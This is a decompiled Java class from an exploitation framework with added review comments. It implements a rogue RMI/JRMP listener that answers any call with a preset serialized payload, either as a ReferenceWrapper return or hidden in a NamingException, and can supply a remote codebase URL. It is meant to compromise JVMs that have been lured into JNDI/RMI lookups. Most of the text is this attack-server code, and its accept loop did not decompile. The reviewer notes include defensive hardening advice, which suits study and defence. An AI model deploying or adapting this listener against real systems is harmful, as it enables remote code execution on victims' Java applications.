package com.ar3h.chains.core.exploit.component;

import com.ar3h.chains.common.util.Reflections;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.UID;
import java.util.Arrays;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javax.naming.NamingException;
import javax.net.ServerSocketFactory;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/exploit/component/FakeRMIHandler.class */
/**
 * Decompiled (JADX) TCP listener that answers an RMI-style call with a pre-built serialized object
 * instead of a genuine remote-call result.
 *
 * <p>What the visible code establishes:
 * <ul>
 *   <li>A {@link ServerSocket} is bound on {@code port} in both constructors.</li>
 *   <li>{@code doMessage} reads one transport-op byte per message and dispatches on it.</li>
 *   <li>{@code doCall} reads the target {@link ObjID} through a stream that resolves only
 *       {@code ObjID[]}, {@code ObjID} and {@code UID}, then writes a return record that carries
 *       the stored object, either as a normal return (when it is a {@code ReferenceWrapper}) or
 *       inside a {@link NamingException} as an exceptional return.</li>
 * </ul>
 *
 * <p>The accept loop ({@link #run()}) failed to decompile, so the handshake and the way connections
 * reach {@code doMessage} cannot be confirmed from this listing.
 *
 * <p>NOTE(review), defender view: the peer is presumably a JVM that was induced to open an RMI/JNDI
 * connection to this endpoint and deserializes whatever is returned. Hardening belongs on that JVM:
 * a process-wide deserialization filter ({@code jdk.serialFilter}), keeping
 * {@code com.sun.jndi.rmi.object.trustURLCodebase} and {@code java.rmi.server.useCodebaseOnly} at
 * their secure defaults, never passing untrusted strings to a JNDI lookup, and egress filtering of
 * outbound RMI/JRMP traffic to hosts outside the expected set.
 */
public class FakeRMIHandler {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) FakeRMIHandler.class);
    // TCP port the listener is bound to.
    private final int port;
    // Object written back to the connecting client; fixed at construction time.
    private final Object payloadObject;
    // Listening socket, created in the constructors and closed by close().
    private final ServerSocket ss;
    // Monitor used by waitFor()/close()/doCall() to signal that a call was answered or the listener stopped.
    private final Object waitLock = new Object();
    // Set by close(); presumably polled by run(), which is not visible here.
    // NOTE(review): plain (non-volatile) field written without holding waitLock.
    private boolean exit;
    // Set to true once doCall() has written a reply.
    // NOTE(review): plain (non-volatile) field; waitFor() reads it outside the monitor.
    private boolean hadConnection;
    // Passed to MarshalOutputStream in doCall(); null when the (int, Object) constructor is used.
    private URL classpathUrl;
    // Label built as "RMIServer <port>"; only assigned by the (int, Object) constructor.
    private String identity;

    /* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/exploit/component/FakeRMIHandler$Dummy.class */
    /**
     * Empty serializable template class. {@link #makeDummyObject(String)} copies it under another
     * class name and instantiates the copy.
     */
    public static class Dummy implements Serializable {
        private static final long serialVersionUID = 1;
    }

    /**
     * Binds the listener and stores a ready-made object to send back.
     *
     * @param i   TCP port to listen on
     * @param obj object that will be serialized into every reply
     * @throws IOException if the server socket cannot be created
     */
    // NOTE(review): nothing visible in this body throws NumberFormatException; the clause is likely
    // a leftover of the original signature or a decompiler artifact.
    public FakeRMIHandler(int i, Object obj) throws NumberFormatException, IOException {
        this.port = i;
        this.payloadObject = obj;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
        this.identity = "RMIServer " + i;
    }

    /**
     * Binds the listener and uses a generated placeholder object named {@code str} as the reply.
     *
     * @param i   TCP port to listen on
     * @param str class name given to the generated {@link Dummy} copy
     * @param url value later handed to {@code MarshalOutputStream} in {@code doCall}
     * @throws IOException if the server socket cannot be created
     */
    // NOTE(review): identity is never assigned on this path and stays null.
    // NOTE(review): MarshalOutputStream is not shown; it presumably annotates the stream with url as
    // a codebase. Receivers running with java.rmi.server.useCodebaseOnly=true ignore such annotations.
    public FakeRMIHandler(int i, String str, URL url) throws IOException {
        this.port = i;
        this.payloadObject = makeDummyObject(str);
        this.classpathUrl = url;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    /**
     * Blocks until a call has been answered, the listener is closed, or the timeout elapses.
     *
     * @param i timeout handed to {@link Object#wait(long)}, i.e. milliseconds
     * @return {@code true} if a reply had been sent by the time the wait ended; {@code false} on
     *         timeout without a reply or when the waiting thread is interrupted
     */
    public boolean waitFor(int i) {
        try {
            // Fast path: a reply was already sent before the caller started waiting.
            // NOTE(review): this check happens outside waitLock, so a notifyAll() issued between the
            // check and wait() is missed and the caller then sleeps for the full timeout.
            if (this.hadConnection) {
                return true;
            }
            log.info("Waiting for connection");
            synchronized (this.waitLock) {
                // Single wait, not a loop: a spurious wakeup returns the current flag value.
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        } catch (InterruptedException e) {
            // NOTE(review): the interrupt status is not restored before returning.
            return false;
        }
    }

    /**
     * Marks the listener as stopped, closes the server socket and wakes one thread blocked in
     * {@link #waitFor(int)}.
     */
    public void close() {
        this.exit = true;
        try {
            this.ss.close();
            log.info("Fake RMI Listener stopped");
        } catch (IOException e) {
            // Close failure is deliberately ignored; the "stopped" message is then not logged.
        }
        synchronized (this.waitLock) {
            // NOTE(review): notify() wakes a single waiter, whereas doCall() uses notifyAll().
            this.waitLock.notify();
        }
    }

    /* JADX WARN: Finally extract failed */
    /* JADX WARN: Removed duplicated region for block: B:62:0x01d7 A[Catch: SocketException -> 0x020a, Exception -> 0x020e, TryCatch #6 {SocketException -> 0x020a, Exception -> 0x020e, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x005b, B:21:0x00a2, B:22:0x00c7, B:28:0x00e0, B:30:0x00ee, B:31:0x0106, B:37:0x00fa, B:32:0x0120, B:33:0x0153, B:34:0x0160, B:24:0x0130, B:25:0x0141, B:16:0x0089, B:17:0x0090, B:40:0x0053, B:48:0x0173, B:50:0x0189, B:51:0x018d, B:53:0x0194, B:57:0x019d, B:58:0x01a7, B:43:0x01bb, B:44:0x01be, B:45:0x01cf, B:62:0x01d7, B:63:0x01db, B:65:0x01e2, B:72:0x01f2, B:73:0x01f6, B:75:0x01fd, B:77:0x0206), top: B:2:0x0002 }] */
    /* JADX WARN: Removed duplicated region for block: B:65:0x01e2 A[Catch: SocketException -> 0x020a, Exception -> 0x020e, TryCatch #6 {SocketException -> 0x020a, Exception -> 0x020e, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x005b, B:21:0x00a2, B:22:0x00c7, B:28:0x00e0, B:30:0x00ee, B:31:0x0106, B:37:0x00fa, B:32:0x0120, B:33:0x0153, B:34:0x0160, B:24:0x0130, B:25:0x0141, B:16:0x0089, B:17:0x0090, B:40:0x0053, B:48:0x0173, B:50:0x0189, B:51:0x018d, B:53:0x0194, B:57:0x019d, B:58:0x01a7, B:43:0x01bb, B:44:0x01be, B:45:0x01cf, B:62:0x01d7, B:63:0x01db, B:65:0x01e2, B:72:0x01f2, B:73:0x01f6, B:75:0x01fd, B:77:0x0206), top: B:2:0x0002 }] */
    /*
        Code decompiled incorrectly, please refer to instructions dump.
        To view partially-correct add '--show-bad-code' argument
    */
    /**
     * Decompiler stub for the listener's main loop.
     *
     * <p>JADX could not reconstruct this method, so the body below only throws. The real bytecode
     * (535 instructions according to the dump note) is not represented in this listing; any
     * statement about the accept loop or handshake has to come from the class file itself.
     */
    public void run() {
        /*
            Method dump skipped, instructions count: 535
            To view this dump add '--comments-level debug' option
        */
        throw new UnsupportedOperationException("Method not decompiled: com.ar3h.chains.core.exploit.component.FakeRMIHandler.run():void");
    }

    /**
     * Reads one transport-op byte from the peer, handles it, then closes the socket.
     *
     * <p>The numeric cases match the JRMP transport constants: 80 = Call, 81 = Return, 82 = Ping,
     * 83 = PingAck, 84 = DGCAck.
     *
     * @param socket           connection to close once the message has been handled
     * @param dataInputStream  peer input, positioned at the op byte
     * @param dataOutputStream peer output
     * @param obj              object forwarded to {@code doCall}; presumably {@code payloadObject},
     *                         but the caller is not visible here
     * @throws Exception on an unexpected op byte or any failure while answering a call
     */
    private void doMessage(Socket socket, DataInputStream dataInputStream, DataOutputStream dataOutputStream, Object obj) throws Exception {
        // NOTE(review): the message has no "{}" placeholder, so SLF4J never renders this.identity.
        log.info("    Reading message...", this.identity);
        int read = dataInputStream.read();
        switch (read) {
            case 80:
                // Call: answer with the stored object.
                doCall(dataInputStream, dataOutputStream, obj);
                break;
            case 81:
            case 83:
            default:
                // Return/PingAck are server-to-client ops; they and anything unknown (including -1
                // at end of stream) are rejected.
                throw new IOException("unknown transport op " + read);
            case 82:
                // Ping: reply with PingAck.
                dataOutputStream.writeByte(83);
                break;
            case 84:
                // DGCAck: consume the UID that follows and ignore it.
                UID.read(dataInputStream);
                break;
        }
        // Not in a finally block: when a case throws, this close is skipped and cleanup is left to
        // the caller (not visible here).
        socket.close();
    }

    /**
     * Parses the header of an incoming call and writes a return record containing {@code obj}.
     *
     * @param dataInputStream  peer input, positioned just after the Call op byte
     * @param dataOutputStream peer output that receives the return record
     * @param obj              object serialized into the reply
     * @throws Exception a {@link MarshalException} wrapping any {@link IOException} raised while
     *                   reading the request or writing the reply
     */
    private void doCall(DataInputStream dataInputStream, DataOutputStream dataOutputStream, Object obj) throws Exception {
        // Inbound objects are resolved against a three-class allowlist; every other class name is
        // refused before it can be instantiated. This is the look-ahead (allowlist) deserialization
        // pattern, applied here to data coming from the connecting peer.
        ObjectInputStream objectInputStream = new ObjectInputStream(dataInputStream) { // from class: com.ar3h.chains.core.exploit.component.FakeRMIHandler.1
            @Override // java.io.ObjectInputStream
            protected Class<?> resolveClass(ObjectStreamClass objectStreamClass) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.server.ObjID;".equals(objectStreamClass.getName())) {
                    return ObjID[].class;
                }
                if ("java.rmi.server.ObjID".equals(objectStreamClass.getName())) {
                    return ObjID.class;
                }
                if ("java.rmi.server.UID".equals(objectStreamClass.getName())) {
                    return UID.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            ObjID read = ObjID.read(objectInputStream);
            // 2 is the well-known object number of the distributed garbage collector (ObjID.DGC_ID);
            // NOTE(review): relies on ObjID.hashCode() exposing the object number — confirm.
            if (read.hashCode() == 2) {
                // In a JRMP call header these are the operation number and the interface hash;
                // both are read and discarded.
                objectInputStream.readInt();
                objectInputStream.readLong();
                log.info("    Is DGC call for " + Arrays.toString((ObjID[]) objectInputStream.readObject()), this.identity);
            }
            // For any other object id the rest of the request is left unread; the reply is sent
            // regardless of which object or method was addressed.
            log.info("    Sending return with payload for obj " + read, this.identity);
            // 81 = Return transport op.
            dataOutputStream.writeByte(81);
            MarshalOutputStream marshalOutputStream = new MarshalOutputStream(dataOutputStream, this.classpathUrl);
            if (obj instanceof ReferenceWrapper) {
                packReferenceObject(marshalOutputStream, obj);
            } else {
                packExceptionObject(marshalOutputStream, obj);
            }
            // Record that a reply went out and release every thread blocked in waitFor().
            this.hadConnection = true;
            synchronized (this.waitLock) {
                this.waitLock.notifyAll();
            }
        } catch (IOException e) {
            // NOTE(review): the try also covers the write path and the allowlist rejection, so the
            // fixed message "unable to read objID" can describe unrelated failures.
            throw new MarshalException("unable to read objID", e);
        }
    }

    /**
     * Writes an exceptional return: marker byte 2, a fresh {@link UID}, then a
     * {@link NamingException} whose {@code resolvedObj} field is set to {@code obj}.
     *
     * @param objectOutputStream stream the return record is written to
     * @param obj                object placed into the exception's {@code resolvedObj} field
     * @throws Exception only from the initial marker-byte write; failures inside the try block are
     *                   logged and swallowed
     */
    private void packExceptionObject(ObjectOutputStream objectOutputStream, Object obj) throws Exception {
        log.info("    Send exception payload.", this.identity);
        // 2 = ExceptionalReturn in the JRMP transport constants.
        objectOutputStream.writeByte(2);
        try {
            new UID().write(objectOutputStream);
            NamingException namingException = new NamingException();
            // Field is set reflectively through the project's Reflections helper (not shown).
            Reflections.setFieldValue(namingException, "resolvedObj", obj);
            objectOutputStream.writeObject(namingException);
            objectOutputStream.flush();
        } catch (Exception e) {
            // NOTE(review): the error is swallowed, so doCall() still sets hadConnection even though
            // the record may be incomplete; the stack trace goes to stderr rather than the logger.
            log.error("payload serialize error，reason：" + e.getMessage());
            e.printStackTrace();
        }
    }

    /**
     * Writes a normal return: marker byte 1, a fresh {@link UID}, then {@code obj} itself.
     *
     * @param objectOutputStream stream the return record is written to
     * @param obj                object serialized as the call's return value
     * @throws IOException if any write or the flush fails
     */
    private void packReferenceObject(ObjectOutputStream objectOutputStream, Object obj) throws IOException {
        log.info("    Send reference payload.", this.identity);
        // 1 = NormalReturn in the JRMP transport constants.
        objectOutputStream.writeByte(1);
        new UID().write(objectOutputStream);
        objectOutputStream.writeObject(obj);
        objectOutputStream.flush();
    }

    /**
     * Creates an instance of a copy of {@link Dummy} whose class name is {@code str}.
     *
     * <p>The copy is produced with Javassist and defined in a fresh anonymous {@link ClassLoader}.
     *
     * @param str class name to give the generated class
     * @return the new instance, or an empty {@code byte[]} if generation fails
     */
    protected static Object makeDummyObject(String str) {
        try {
            ClassLoader classLoader = new ClassLoader() { // from class: com.ar3h.chains.core.exploit.component.FakeRMIHandler.2
            };
            ClassPool classPool = new ClassPool();
            classPool.insertClassPath(new ClassClassPath(Dummy.class));
            CtClass ctClass = classPool.get(Dummy.class.getName());
            ctClass.setName(str);
            return ctClass.toClass(classLoader).newInstance();
        } catch (Exception e) {
            // NOTE(review): failure is reported only on stderr and the caller receives byte[0], so
            // the constructor continues with an empty array as its payload object.
            e.printStackTrace();
            return new byte[0];
        }
    }
}
